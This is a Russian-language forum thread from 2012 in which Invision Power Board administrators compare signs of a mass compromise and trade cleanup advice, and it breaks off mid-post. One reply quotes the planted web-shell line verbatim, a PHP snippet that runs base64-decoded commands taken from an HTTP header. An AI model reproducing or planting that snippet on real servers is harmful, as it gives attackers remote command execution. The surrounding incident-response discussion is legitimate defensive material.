Вопрос об обновлении безопасности IPB 3.1.x, 3.2.x, 3.3.x от 07.11.201

[HOOKAHPRO]

25 October 2012 Стало известно об уязвимостях IPB... О чем было написанно на сайте http://community.invisionpower.com/

Но пользователям преобретшим IPB у ibresource.ru об этом ни чего небыло сообщено...

Заплатка для рускоязычного сообщества предоставлена только 07.11.2012.

Собственно вопросы:

1. Чем 14 дней занимались сотрудники ibresource.ru

2. Почему небыли предупреждены клиенты

 

Всем клиентам ibresource.ru

Проверьте свой форум на наличие изменений в файлах...

Здесь видно содержимое корневой директории одного из сайтов взломанного аккаунта:

Подчеркнуты "лишние" папки и файлы, а также стандартные, если их подменили.

 

 

 

Содержимое одной из "лишних" папок:

 

Проверьте /uploads/profile/photo-128.jpg если там есть такой файл размер ~67.38 KB

То вы заражены...

 

Так же вирусы приписываются в базе...

в таблице `core_hooks_files` подменили путь к хукам

в boardIndexRecentTopics вел к тому самому файлу /uploads/profile/photo-128.jpg

и еще тут

 

Дерзайте, проверяйте...

И отписывайтесь...

Очень хочется услышапть ответы от ibresource.ru

[KypoJIecoB]

у меня все чисто....и как то весной у меня появился вирус в картинке jpg....и тут же хостер закрыл все сайты и отписал мне письмо что хост заражен и я должен почистить...почистил и все норм))

[nstrochkov]

Подскажите, пожалуйста!

 

/uploads/profile/photo-128.jpg - был. И внутри была не картинка.

Никаких "лишних" файлов и папок как на скриншоте - не обнаружено.

 

Что еще проверить и какие меры принять?

[Креол]

Подскажите, пожалуйста!

 

/uploads/profile/photo-128.jpg - был. И внутри была не картинка.

Никаких "лишних" файлов и папок как на скриншоте - не обнаружено.

 

Что еще проверить и какие меры принять?

 

Необходимо проверить все папки имеющие право на запись на предмет посторонних php файлов, их можно отследить по дате. После вычистки - сменить все административные пароли.

[HOOKAHPRO]

Подскажите, пожалуйста!

 

/uploads/profile/photo-128.jpg - был. И внутри была не картинка.

Никаких "лишних" файлов и папок как на скриншоте - не обнаружено.

 

Что еще проверить и какие меры принять?

 

Оптимально взять бэкап не зараженный числа так от 01.11.2012 и перезалить весь форум...

Измененных и лишних файлов в форуме сейчас у вас будет очень много....

например тут...

/cache/9ed28f49e4a432d582c27def5cb172e3.php

/cache/cache_clean.php

/cache/2f617aab0a2e830c7370a745b88af170.php

/cache/ipbcache.php

/cache/view-cache.php

 

это только на вскидку..)))

[ChipZzz]

Меня лично ломанули, как и море других форумов. Похоже все на автомате делается. Так что проверять ВСЕМ!

Какие симптомы у меня были, например:

Три "лишних" файла php в директории cache (имена могут быть разные, проверяйте).

Самого гадского, а именно файла photo-128.jpg не было, слава богу, но это чисто "повезло".

В базе данных остался мусор по этим трем файлам (это как минимум, что нашли).

В общем после долгих плясок и танцев стало понятно, что нет никакой уверенности, что дрянь не сидит где-то еще, так что пришлось восстановиться из бэкапа, потому что теперь ей уже по-фигу наши патчи.

(Зараза по отзывам распространяется с первых чисел ноября, но не факт, что кто-то не попал в конце октября).

 

Пришлось сменить все пароли на все что можно у критичных аккаунтов (у хостера, на БД, на фтп, админам форума, форумному почтовому ящику и т.п.)

Иначе говоря, событие действительно вселенского масштаба, народ кипит, объявления с предупреждениями своим форумчанам пишет, а здесь у IBR как всегда тишь, да гладь....

Благодать!

 

 

Мало того, IBR по-началу патчи от 07 ноября выложила даже не правленные под "русские" версии, тупо предоставила английские версии файлов, слава богу, потом дали "наши".

 

В итоге мы "закрылись" только 11 числа, но.... было уже поздно

 

********-----------------------------**********

Вот ссылка на обсуждение этой темы: http://ipbskins.ru/f...topic10798.html

И еще http://ipbmafia.ru/t...мов-которые-не/

[Denis Chursinov]

Хронология такая. 20 октября был опубликован эксплоит. 25 октября IPS выпустили патч. В тот же день IBR начали раздавать локализованную версию по запросу. Патч не закрывал уязвимость и был бесполезен, поэтому не имело смысла раздавать его массово. 06 ноября вышел рабочий патч. В тот же день IBR начали раздавать локализованную версию по запросу. 07 ноября появилась новость с локализованным патчем на форуме и сайте.

[nstrochkov]

Оптимально взять бэкап не зараженный числа так от 01.11.2012 и перезалить весь форум...

Измененных и лишних файлов в форуме сейчас у вас будет очень много....

например тут...

/cache/9ed28f49e4a432d582c27def5cb172e3.php

/cache/cache_clean.php

/cache/2f617aab0a2e830c7370a745b88af170.php

/cache/ipbcache.php

/cache/view-cache.php

Бэкапы есть.

Если не сложно - можно подробнее?

Просто перезаписать старыми бэкапными файлами все "новые"?

Убивать папку форума и перезаливать всё - картинки и прочий пользовательский аплоад же потеряю...

 

А с изменениями в базе что делать?

[siv1987]

Патч не закрывал уязвимость и был бесполезен, поэтому не имело смысла раздавать его массово.

Чушь. По крайней мере патч ИПС закрывал дыру от эксплойта котором были взломаны 99% процентов форумов. Позже вышел еще один обобщающий патч, для еще одного примерно такого недочета. Но так как школота и в первом то толком не особенно понимает, то со вторым небыло ни одного взлома. А ибр даже свой форум до конца не очистили.

[Yape]

У меня все чисто, пока, покажите пожалуйста, где скачать патч для русских версий?

[IBResource]

http://forums.ibresource.ru/index.php?/topic/64833/

Патч в этой теме полностью закрывает все возможные потенциальной уязвимости последних недель (обсуждаемых с конца октября до 7 ноября)

[nstrochkov]

http://forums.ibreso...p?/topic/64833/

Патч в этой теме полностью закрывает все возможные потенциальной уязвимости последних недель (обсуждаемых с конца октября до 7 ноября)

А если его ставить уже ПОСЛЕ того как имеются признаки заражения?

Например, как в сообщении 5 в этой ветке.

 

Есть инструкция по последующей чистке? Файлы? БД ?

[Denis Chursinov]

Патч не закрывал уязвимость и был бесполезен, поэтому не имело смысла раздавать его массово.

Чушь. По крайней мере патч ИПС закрывал дыру от эксплойта котором были взломаны 99% процентов форумов. Позже вышел еще один обобщающий патч, для еще одного примерно такого недочета.

Вам виднее. Я, к сожалению, не имею доступа даже к 1% форумов.

 

А если его ставить уже ПОСЛЕ того как имеются признаки заражения?

Например, как в сообщении 5 в этой ветке.

 

Есть инструкция по последующей чистке? Файлы? БД ?

 

Ставить нужно в любом случае. В БД ничего чистить не нужно. Лучший вариант удалить все файлы и перезаписать из резервной копии, сделанной до взлома. Если такой возможности нет, то ищите свежие файлы в папках cache,public,uploads,hooks и их подпапках, а также в корне форума. Это как правило php файл с длинным именем из случайных символов вроде 9ed28f49e4a432d582c27def5cb172e3 и удобочитаемый с той же датой создания. Внутри одного будет каркаc sql-лога, но вместо текста ошибки php-код:

=======================================================================================================
END
============================================================
/forum_or/index.php?<php?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?>
===============================================================================================
================== ============================================================================== 

Второй - обфусцированный код, обычно в начале идет длинное присвоение переменным значений, а затем несколько строк кода, составленного из этих переменных. Ну и картинка само собой, всегда 128ая. Второй способ взлома вместо картинки оставляет sh.php или zx.php в папке cache или корне форума, в остальном все тоже самое. Несколько раз видел код, дописанный в начало conf_global.php.

 

После удаления всех новых файлов нужно сменить пароль к базе данных и к АЦ форума.

 

Все это справедливо если ваш форум ломали готовым скриптом, если злоумышленник приложил немного фантазии, то мог и дописать в какой-нибудь существующий файл свой код или приписать код к шаблону внешнего вида в базе данных.

[HOOKAHPRO]

у меня заражение датируется 28.10.2012.

Просто перезаписать старыми бэкапными файлами все "новые"?

Стереть все имеющееся и залить бэкап...

Убивать папку форума и перезаливать всё - картинки и прочий пользовательский аплоад же потеряю...

А у вас, что аплоадс не бэкапится???

Если нет, то качать ее и на комп и проверять ручками, что картинка, а что скрипт...

А с изменениями в базе что делать?

Две нижние строки я удалил, а с верхней поступил так...

Для начала попробуйте сделать переимпортирование всех хуков из админки. Если само не восстановится, то:

 

В папке hooks ищете название файла boardIndexRecentTopicsXXXXXXXXXXXXXXXXX.php. И в ячейке 'hook_file_stored' вместо "../uploads/profile/photo-128.jpg" прописываете его.

 

Потом в бекапах открываете этот файл, копируете содержимое и в ячейку 'hooks_source' вставляете.

 

я вставил в hooks_source содержимое файла boardIndexRecentTopicsXXXXXXXXXXXXXXXXX.php

Оно соответствует бэкапному..)))

[nstrochkov]

А у вас, что аплоадс не бэкапится???

Бекапится всё. Постоянно и многократно.

Я прошу отнестись с пониманием, но я не очень соображаю просто что как устроено внутри у IPB.

Весь пользовательский аплоад - он только в папке /forum/uploads ?

Т.е. все другие папки я могу смело перезаписать из бэкапа скажем от 25 октября и при этом никаких потерь на форуме не будет?

 

Если нет, то качать ее и на комп и проверять ручками, что картинка, а что скрипт...

Папку можно скачать на комп, открыть ее каким-нибудь faststone и он нарисует крестики вместо превьюшек на подозрительных файлах.

 

Две нижние строки я удалил, а с верхней поступил так...

Для начала попробуйте сделать переимпортирование всех хуков из админки. Если само не восстановится, то:

В папке hooks ищете название файла boardIndexRecentTopicsXXXXXXXXXXXXXXXXX.php. И в ячейке 'hook_file_stored' вместо "../uploads/profile/photo-128.jpg" прописываете его.

Потом в бекапах открываете этот файл, копируете содержимое и в ячейку 'hooks_source' вставляете.

я вставил в hooks_source содержимое файла boardIndexRecentTopicsXXXXXXXXXXXXXXXXX.php

Ох... Не скажу, что всё понял, но попробую... Если не поможет - буду еще просить помощи. Спасибо!

[nstrochkov]

HOOKAHPRO , всё получилось! Спасибо огромное!

[Yamamura]

Прям напасть какая-то по взломам в последнее время, видимо. У меня на днях разом были взломаны на одном домене сайт и вики. С форумом вроде бы пронесло, однако также имелись изменённые php-файлы с встроенным в их начало сторонним кодом.

[polk]

Мы заметили проблему 6 ноября - форум стал сильно тормозить, установили обновление системы безопасности, но оно помогло слабо. Написать в техподдержку письмо не получилось - ссылка из форума перестала подключаться, и выдавала ошибку. Форум вробе работал, но пропала функция поиска. Я сегодня написал письмо в техподдержку через клиент-центр, мне посоветовали почитать эту ветку и установить локализованную версию обновления безопасности. Если вчера на форуме регистрировалось несколько человек в день, то сегодня их количество увеличилось в десятки раз! Вручную забанил все айпи-адреса, но они продолжают лезть, как тараканы. Поудалял все php-файлы с длинными именами, ситуация не изменилась. Техподдержка разбираться не хочет. Посоветуте, братцы, что делать. В программировании я не силен, но зловредный код разыскать смогу.

Только ведь это сколько файлов надо перелопатить?

[siv1987]

Обновления безопасности к спам ботов отношения не имеет. Ставьте адекватную капчу, или запретите регистрацию если видите что не справляетесь. По поводу безопасности, нужно поставить заплатки и удалить все шеллы которые вам поставили. Но еще раз повторяю, к ботам и регистраций на сайте они отношение не имеет.

[Beavis]

Сегодня на всех форумах спамят... не только IPB. Видимо спамеры дырку какую то нашли

[airmed]

Тоже из кеша поудалял кучу г**на

 

 

Как можно проконтролировать активность этой гадости на случай если где-то еще осталась?

[WWWovan]

Стоит версия 3.1.4.

Вчера перестала открыватся админка форума. Выдает: "504 Gateway Time-out"

Заплатки поставил 09.11. Сегодня нашел и удалил в папке cache несколько php-файлов с длинными именами.

 

Может, кто сталкивался? Как вернуть к жизни админку?

Изменено 18 Ноября 2012 пользователем WWWovan

[HOOKAHPRO]

Востонавить бэкап из более ранней версии...

Поставить заплатки...

Проверить файлы и базу на наличие нечести...

[KypoJIecoB]

проверил у себя.... все как то подозрительно чисто.... и так и сяк смотрел нет ничего.... может мне повезло Изменено 19 Ноября 2012 пользователем KypoJIecoB

[nalssur]

Сегодня форум взломали, взлом проявлялся в том что пользователям мобильных устройств предлагалось поставить новые версии браузеров.

Вредоносный код был записан в файле .htaccess

 

Залез сюда, думал кто-то знает об этом взломе. У всех ок?

 

Проблема обсуждается здесь например: http://ipbzona.ru/topic/3940-virus-pereadresacija/

[nalssur]

Может кому понадобится. Вредоносный код из файлов php вычистил, после того как нашел все такие файлы по совету отсюда: http://habrahabr.ru/post/136320/

 

Только конечно команда

 

grep -rl ‘IPB_FIREWALL’ *